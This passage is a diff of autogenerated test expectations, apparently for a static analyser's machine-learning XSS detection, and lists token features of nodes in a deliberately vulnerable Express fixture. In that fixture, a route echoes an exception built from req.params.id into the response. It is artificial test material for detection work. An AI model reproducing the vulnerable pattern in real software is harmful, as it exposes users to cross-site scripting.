autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:3:107:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:107:5:107:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:107:5:107:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:107:5:107:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19097,6 +129376,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:107:5:107:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:107:5:107:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:107:5:107:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:13:107:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:13:107:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:13:107:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:13:107:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:107:13:107:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:107:18:107:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:107:18:107:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:107:18:107:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19104,12 +129388,63 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:107:18:107:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:107:18:107:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:107:18:107:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:5:111:11 | express | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:5:111:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:5:111:11 | express | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:5:111:32 | express | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:5:111:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:5:111:32 | express | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:5:111:32 | express ... press') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:5:111:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:5:111:32 | express ... press') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:15:111:21 | require | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:15:111:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:15:111:21 | require | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:15:111:32 | exceptional return of require('express') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:15:111:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:15:111:32 | exceptional return of require('express') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:15:111:32 | require('express') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:15:111:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:111:15:111:32 | require('express') | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:111:23:111:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ExceptionXss/exception-xss.js:111:23:111:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:111:23:111:31 | 'express' | calleeImports | | | autogenerated/Xss/ExceptionXss/exception-xss.js:111:23:111:31 | 'express' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | | autogenerated/Xss/ExceptionXss/exception-xss.js:111:23:111:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/exception-xss.js:111:23:111:31 | 'express' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:5:113:7 | app | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:5:113:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:5:113:7 | app | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:5:113:19 | app | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:5:113:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:5:113:19 | app | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:5:113:19 | app = express() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:5:113:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:5:113:19 | app = express() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:11:113:17 | express | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:11:113:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:11:113:17 | express | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:11:113:19 | exceptional return of express() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:11:113:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:11:113:19 | exceptional return of express() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:11:113:19 | express() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:11:113:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:113:11:113:19 | express() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:115:3 | app | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:115:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:115:3 | app | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:115:7 | app.get | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:115:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:115:7 | app.get | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:121:2 | app.get ... !\\n\\t}\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:121:2 | app.get ... !\\n\\t}\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:121:2 | app.get ... !\\n\\t}\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:121:2 | exceptional return of app.get ... !\\n\\t}\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:121:2 | exceptional return of app.get ... !\\n\\t}\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:1:121:2 | exceptional return of app.get ... !\\n\\t}\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:5:115:7 | get | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:5:115:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:5:115:7 | get | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:115:9:115:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ExceptionXss/exception-xss.js:115:9:115:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:115:9:115:19 | '/user/:id' | calleeImports | express | @@ -19117,6 +129452,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:115:9:115:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/exception-xss.js:115:9:115:19 | '/user/:id' | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:115:9:115:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:115:21 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:115:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:115:21 | this | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:115:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:115:21 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | 'arguments' object of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | exceptional return of anonymous function | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | exceptional return of anonymous function | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | functio ... K!\\n\\t}\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | functio ... K!\\n\\t}\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | functio ... K!\\n\\t}\\n} | calleeImports | express | @@ -19124,6 +129474,56 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | functio ... K!\\n\\t}\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | functio ... K!\\n\\t}\\n} | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | functio ... K!\\n\\t}\\n} | receiverName | app | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | return of anonymous function | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:22:121:1 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:32:115:34 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:32:115:34 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:32:115:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:32:115:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:32:115:34 | req | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:32:115:34 | req | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:32:115:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:32:115:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:32:115:34 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:32:115:34 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:37:115:39 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:37:115:39 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:37:115:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:37:115:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:37:115:39 | res | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:37:115:39 | res | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:37:115:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:37:115:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:37:115:39 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:115:37:115:39 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:9 | unknown | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:9 | unknown | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:9 | unknown | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:24 | exceptional return of unknown ... ams.id) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:24 | exceptional return of unknown ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:24 | exceptional return of unknown ... ams.id) | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:24 | exceptional return of unknown ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:24 | exceptional return of unknown ... ams.id) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:24 | unknown ... ams.id) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:24 | unknown ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:24 | unknown ... ams.id) | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:24 | unknown ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:3:117:24 | unknown ... ams.id) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:13 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:13 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:13 | req | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:13 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:13 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:20 | req.params | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:20 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:20 | req.params | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:20 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:20 | req.params | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:23 | req.params.id | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:23 | req.params.id | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:23 | req.params.id | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19131,6 +129531,57 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:23 | req.params.id | enclosingFunctionBody | req res unknown req params id e res send Exception: e | | autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:23 | req.params.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:117:11:117:23 | req.params.id | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:15:117:20 | params | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:15:117:20 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:15:117:20 | params | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:15:117:20 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:15:117:20 | params | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:22:117:23 | id | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:22:117:23 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:22:117:23 | id | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:22:117:23 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:117:22:117:23 | id | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:118:11:118:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:118:11:118:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:118:11:118:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:118:11:118:11 | e | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:118:11:118:11 | e | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:118:11:118:11 | e | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:118:11:118:11 | e | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:118:11:118:11 | e | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:118:11:118:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:118:11:118:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:5 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:5 | res | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:5 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:10 | res.send | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:10 | res.send | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:10 | res.send | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:29 | exceptional return of res.sen ... " + e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:29 | exceptional return of res.sen ... " + e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:29 | exceptional return of res.sen ... " + e) | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:29 | exceptional return of res.sen ... " + e) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:29 | exceptional return of res.sen ... " + e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:29 | res.sen ... " + e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:29 | res.sen ... " + e) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:29 | res.sen ... " + e) | enclosingFunctionBody | req res unknown req params id e res send Exception: e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:29 | res.sen ... " + e) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:3:119:29 | res.sen ... " + e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:119:7:119:10 | send | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| 